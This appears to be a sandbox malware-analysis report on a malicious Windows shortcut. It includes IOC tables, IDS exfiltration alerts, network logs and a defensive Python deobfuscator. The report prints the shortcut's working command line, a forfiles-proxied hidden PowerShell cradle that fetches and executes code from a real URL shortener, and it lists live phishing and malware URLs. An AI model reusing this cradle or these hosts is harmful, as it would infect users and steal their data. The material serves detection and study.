162.159.137.232 | 0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER |
162.159.137.232 | SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exe | malicious | Unknown |
162.159.137.232 | WCA-Cooperative-Agreement.docx.exe | malicious | Babadeda, Exela Stealer, Python Stealer, Waltuhium Grabber |
162.159.137.232 | main.bat.bin.bat | malicious | Discord Rat |
162.159.137.232 | Bootstrapper V1.19.exe | malicious | Python Stealer, Empyrean, Discord Token Stealer |
162.159.137.232 | https://buxb0t.github.io/https-www.instagram.com-reel-CtFCB1_MvyH- | malicious | HTMLPhisher |
162.159.137.232 | http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/ | malicious | Unknown |
162.159.137.232 | SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe | malicious | Unknown |
162.159.137.232 | https://mj.ostep.net/acknowledgements | malicious | Unknown |
162.159.137.232 | SecuriteInfo.com.Win32.MalwareX-gen.5836.3825.exe | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | cr_asm.ps1 | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | na.hta | malicious | Cobalt Strike, Remcos | 185.199.109.133
raw.githubusercontent.com | na.hta | malicious | Cobalt Strike, FormBook | 185.199.108.133
raw.githubusercontent.com | oWARzPF1Ms.exe | malicious | PureLog Stealer | 185.199.108.133
raw.githubusercontent.com | oWARzPF1Ms.exe | malicious | PureCrypter, PureLog Stealer | 185.199.108.133
raw.githubusercontent.com | New PO-RFQ13101.xla.xlsx | malicious | FormBook | 185.199.110.133
raw.githubusercontent.com | Upit 220062.xls | malicious | Remcos | 185.199.108.133
raw.githubusercontent.com | Swift Payment 20241014839374.vbs | malicious | Remcos | 185.199.111.133
raw.githubusercontent.com | Image_Attachments.xls | malicious | Remcos | 185.199.111.133
raw.githubusercontent.com | Purchase Order.js | malicious | AgentTesla | 185.199.109.133
tinyurl.com | https://tinyurl.com/y9r5fvas | malicious | Unknown | 104.17.112.233
tinyurl.com | https://tinyurl.com/5xa2ubd7 | malicious | Unknown | 104.17.112.233
tinyurl.com | SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | 104.17.112.233
tinyurl.com | SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | 104.17.112.233
tinyurl.com | SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm | 104.18.111.161
tinyurl.com | balcao242609.vbs | malicious | Unknown | 104.18.111.161
tinyurl.com | https://ibafhfg.r.af.d.sendibt2.com/tr/cl/ei-iIasDUfhajlha_L_PYwmEV0TXG-pmymM0mqP6wJ8jqUBnRevpHf8umV1Cxk0P5A0G7qvQoF39O-oYwRH3RCdSdtx1Y0b_2sg_iXOax_tFc1XZBC3EPtztmZF7qOstNWb2r9nSAsjPU6qj2F8Gg64Ba0d6xBjSEwUcsnsTYaQjAxsh52QvEBY0E7yDJkW8hVMf4Z-UgTv6SrNDoDPMdYdSSvXdtLzPyBKNyGRyOKbA6kM2yCjc-39_2GjmQrGc8IG-6EqDH4Ly9S8KIsA | malicious | Unknown | 104.17.112.233
tinyurl.com | http://tinyurl.com/fresn30d39d | malicious | Unknown | 104.17.112.233
tinyurl.com | https://tinyurl.com/NDCEurope | malicious | Unknown | 104.18.111.161
tinyurl.com | https://sway.cloud.microsoft/lKpl4nBPezd0EfSe | malicious | Unknown | 104.17.112.233
discord.com | cr_asm.ps1 | malicious | Unknown | 162.159.138.232
discord.com | Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.135.232
discord.com | Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.136.232
discord.com | 0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER |
                                                                              • 162.159.137.232
                                                                              0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                              • 162.159.136.232
                                                                              cPl7CoJTBx.exeGet hashmaliciousLuna Grabber, Luna LoggerBrowse
                                                                              • 162.159.128.233
                                                                              SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              SecuriteInfo.com.Python.Muldrop.18.50.31694.exeGet hashmaliciousBlank GrabberBrowse
                                                                              • 162.159.138.232
                                                                              SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.136.232
                                                                              SecuriteInfo.com.Win64.Evo-gen.30154.6249.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.135.232
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUScr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.27.206.92
                                                                              https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                              • 162.159.134.42
                                                                              https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              ordine.pdfGet hashmaliciousUnknownBrowse
                                                                              • 104.21.90.114
                                                                              ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                              • 188.114.96.3
                                                                              order.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 188.114.97.3
                                                                              https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              ordine.pdfGet hashmaliciousUnknownBrowse
                                                                              • 188.114.96.3
                                                                              CLOUDFLARENETUSsteamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.27.206.92
                                                                              https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                              • 162.159.134.42
                                                                              https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              ordine.pdfGet hashmaliciousUnknownBrowse
                                                                              • 104.21.90.114
                                                                              ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                              • 188.114.96.3
                                                                              order.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 188.114.97.3
                                                                              https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              CLOUDFLARENETUSsteamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.27.206.92
                                                                              https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                              • 162.159.134.42
                                                                              https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                              • 1.1.1.1
                                                                              ordine.pdfGet hashmaliciousUnknownBrowse
                                                                              • 104.21.90.114
                                                                              ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                              • 188.114.96.3
                                                                              order.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 188.114.97.3
                                                                              https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              3b5074b1b5d032e5620f69f9f700ff0esteamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              LISTA DE COTIZACIONES.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=janice.atkins@faa.govGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              PO-10-15-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              https://landing-cs.mailcomms.io/73C4D162CAD9C4016A99EC5AF537DA57B4F5451828F0865A7DC8EA34ED2492F0Get hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              https://www.filmize.art/azacGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.137.232
                                                                              • 172.67.19.24
                                                                              • 185.199.111.133
                                                                              No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
Category: dropped
Size (bytes): 1728
Entropy (8bit): 4.527272298423835
Encrypted: false
SSDEEP: 24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
MD5: 724AA21828AD912CB466E3B0A79F478B
SHA1: 41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
SHA-256: D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
SHA-512: B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
Malicious: true
Preview: L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 11608
Entropy (8bit): 4.890472898059848
Encrypted: false
SSDEEP: 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5: 8A4B02D8A977CB929C05D4BC2942C5A9
SHA1: F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256: 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512: 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious: false
Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllulplj:NllU
MD5: 2371E5E805FFD1BD5C5D8E0E5417D04E
SHA1: CA5ECFEFE41E8C2C46F793818AE344F951D9F868
SHA-256: D5954B19DEA37AA6A72E8BB9C73ABD2FC61317D77F5AEB0C0BBF12DAAE099280
SHA-512: C50F8F69B277CB06C9770C51FCE5E41FDCDD84C1A9162F8E5F7AAC0F339CBE1570226E814917A8C4BD28FCAEDCD00B720E02A4C85D6DC07E0FFBAE2FE4C407CB
Malicious: false
Preview: @...e...............................[..".............@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                              Entropy (8bit):4.526019023734725
                                                                              TrID:
                                                                              • Windows Shortcut (20020/1) 100.00%
                                                                              File name:BeginSync lnk.lnk
                                                                              File size:1'718 bytes
                                                                              MD5:d817cae04c295bad04c61c96556f3c0c
                                                                              SHA1:554e536e859e078948acc128edb40c889f36c57d
                                                                              SHA256:a30f3084067e8eb1d503d04281aa27c1088298a3256a5aadf16cfa3ca8f68261
                                                                              SHA512:c4e25843ed1c0ce2f4b86fcb823e01f726d9beefbd8c5f9a38b51e049c35f2675f728eed7140588fec2a08192376299baff5d8d97de44090bfaed0f8f23613c1
                                                                              SSDEEP:24:8MBsCCbRKrzcAJBkr+/4IMsPsiqxlD2uxmCrTYuG4aVlilzXQaR3+hab/Ia7/OBX:8zD6JjNUPx2uxvUu+LozXv3KabINBY0
                                                                              TLSH:E731AE061BEA1726D2B78F75287BA2058E727D52EC73DB9D418002886C60908EC75F7B
                                                                              File Content Preview:L..................F.... ...|%h..a..........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@........T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B........T,*)Y......L_
                                                                              Icon Hash:00828e868e89bd0d

                                                                              General

                                                                              Relative Path:..\..\..\Windows\System32\forfiles.exe
                                                                              Command Line Argument:/p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'"
                                                                              Icon location:
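The command line above is the whole infection chain in one argument string, and it is worth reading it the way a detection engineer would. forfiles.exe is a signed Windows binary that runs the /c command once for every file under /p matching /m; with /m notepad.exe in System32 the command runs exactly once, so forfiles is only a proxy that keeps powershell.exe out of the LNK target itself. The inner script then uses sal (Set-Alias) to hide the cradle: callit becomes iex, and an alias whose name is the runtime value of $env:os (Windows_NT on every Windows host, which is why the later token WINDOWS_NT resolves, aliases being case-insensitive) becomes iwr. The fatbake alias for calc is a decoy that is never invoked. The final statement is therefore iex (iwr tinyurl.com/yeykydun -UseBasicParsing): fetch a second stage through a URL shortener and execute it in memory, which is what the report's "Connects to a URL shortener service" and "Suspicious PowerShell Parameter Substring" signatures are reacting to.

The following Python script is an added example and not part of the Joe Sandbox report or the sample; it statically unwinds exactly this pattern. It takes the forfiles argument string from this page as constructed input, splits the /p, /m and /c parts, pulls the innermost -command payload, substitutes $env:OS from an assumed environment map (the value Windows_NT is the normal one but is supplied here as an assumption so the script runs offline), follows user-defined alias chains into the documented default aliases, and reports whether the resolved script is a web-to-Invoke-Expression cradle. Every function and name in it is the example's own.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample input: the forfiles.exe argument string recorded for this LNK.
LNK_ARGS = (
    r'/p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell '
    "-windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; "
    "calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'\""
)

# Assumption for offline resolution: on any Windows NT-family host $env:OS is
# "Windows_NT", which is why the sample can rely on it as a predictable alias name.
ASSUMED_ENV = {"OS": "Windows_NT"}

# Default PowerShell aliases that matter for download cradles.
BUILTIN_ALIASES = {
    "iex": "Invoke-Expression",
    "iwr": "Invoke-WebRequest",
    "irm": "Invoke-RestMethod",
    "curl": "Invoke-WebRequest",
    "wget": "Invoke-WebRequest",
    "sal": "Set-Alias",
    "saps": "Start-Process",
}


def forfiles_parts(args: str) -> Dict[str, str]:
    """Split a forfiles argument string into /p (path), /m (mask) and /c (command).

    forfiles runs the /c command once per file matching /m under /p; with the mask
    notepad.exe it runs exactly once and the matched file plays no further role.
    """
    m = re.search(r'/p\s+(\S+)\s+/m\s+(\S+)\s+/c\s+"(.*)"\s*$', args, flags=re.DOTALL)
    if not m:
        raise ValueError("not a /p /m /c forfiles invocation")
    return {"path": m.group(1), "mask": m.group(2), "command": m.group(3)}


def innermost_command(text: str) -> str:
    """Return the last single-quoted -command payload of a nested powershell launch."""
    found = re.findall(r"-command\s+'([^']*)'", text, flags=re.IGNORECASE)
    if not found:
        raise ValueError("no quoted -command payload found")
    return found[-1]


def expand_env(text: str, env: Dict[str, str]) -> str:
    """Substitute $env:NAME from the assumed environment; variable names are case-insensitive."""
    lower = {k.lower(): v for k, v in env.items()}
    return re.sub(r"\$env:([A-Za-z_][A-Za-z0-9_]*)",
                  lambda m: lower.get(m.group(1).lower(), m.group(0)), text)


def resolve_aliases(script: str) -> Tuple[Dict[str, str], str]:
    """Strip sal/Set-Alias statements and rewrite the rest with canonical cmdlet names."""
    aliases: Dict[str, str] = {}
    kept: List[str] = []
    for stmt in (s.strip() for s in script.split(";")):
        m = re.fullmatch(r"(?i)(?:sal|set-alias)\s+(\S+)\s+(\S+)", stmt)
        if m:
            aliases[m.group(1).lower()] = m.group(2)   # aliases are case-insensitive
        elif stmt:
            kept.append(stmt)

    def canon(tok: str) -> str:
        # Follow user alias -> (builtin alias) -> cmdlet; the seen set stops cycles.
        seen = set()
        while tok.lower() not in seen:
            seen.add(tok.lower())
            nxt = aliases.get(tok.lower()) or BUILTIN_ALIASES.get(tok.lower())
            if nxt is None:
                break
            tok = nxt
        return tok

    rewritten = [re.sub(r"[A-Za-z_][A-Za-z0-9_\-]*", lambda m: canon(m.group(0)), s)
                 for s in kept]
    return aliases, "; ".join(rewritten)


def deobfuscate(args: str, env: Dict[str, str] = ASSUMED_ENV) -> str:
    """forfiles args -> resolved inner PowerShell with aliases and $env: references removed."""
    parts = forfiles_parts(args)
    script = expand_env(innermost_command(parts["command"]), env)
    return resolve_aliases(script)[1]


def is_download_cradle(resolved: str) -> bool:
    """True when the resolved script feeds fetched web content into Invoke-Expression."""
    fetch = re.search(r"Invoke-WebRequest|Invoke-RestMethod|DownloadString", resolved, re.I)
    return bool(fetch) and bool(re.search(r"Invoke-Expression", resolved, re.I))


if __name__ == "__main__":
    resolved = deobfuscate(LNK_ARGS)
    print(resolved)   # Invoke-Expression(Invoke-WebRequest tinyurl.com/yeykydun -usebasicparsing)
    print("download cradle:", is_download_cradle(resolved))
```

The resolver deliberately works on text rather than executing anything, so it can be run over LNK command lines pulled from mail gateways or EDR process-creation events. A detection built on the resolved form (Invoke-Expression applied to Invoke-WebRequest output) survives alias renaming; a detection that only looks for the literal strings iex or iwr does not, which is the point of this sample's obfuscation.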
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-15T15:53:52.186365+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.10 | 49711 | 162.159.137.232 | 443 | TCP
2024-10-15T15:54:08.179140+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.10 | 49720 | 162.159.137.232 | 443 | TCP
2024-10-15T15:54:16.372817+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.10 | 49722 | 162.159.137.232 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 15:53:24.573574066 CEST | 49701 | 80 | 192.168.2.10 | 104.18.111.161
Oct 15, 2024 15:53:24.578418016 CEST | 80 | 49701 | 104.18.111.161 | 192.168.2.10
Oct 15, 2024 15:53:24.578550100 CEST | 49701 | 80 | 192.168.2.10 | 104.18.111.161
Oct 15, 2024 15:53:24.581403017 CEST | 49701 | 80 | 192.168.2.10 | 104.18.111.161
Oct 15, 2024 15:53:24.586416006 CEST | 80 | 49701 | 104.18.111.161 | 192.168.2.10
Oct 15, 2024 15:53:25.267205954 CEST | 80 | 49701 | 104.18.111.161 | 192.168.2.10
Oct 15, 2024 15:53:25.267227888 CEST | 80 | 49701 | 104.18.111.161 | 192.168.2.10
Oct 15, 2024 15:53:25.267292976 CEST | 49701 | 80 | 192.168.2.10 | 104.18.111.161
Oct 15, 2024 15:53:25.385200977 CEST | 49702 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:25.385272026 CEST | 443 | 49702 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:25.385431051 CEST | 49702 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:25.502794027 CEST | 49702 | 443 | 192.168.2.10 | 104.20.3.235
Oct 15, 2024 15:53:25.502837896 CEST | 443 | 49702 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:26.133791924 CEST | 443 | 49702 | 104.20.3.235 | 192.168.2.10
Oct 15, 2024 15:53:26.133910894 CEST | 49702 | 443 | 192.168.2.10 | 104.20.3.235
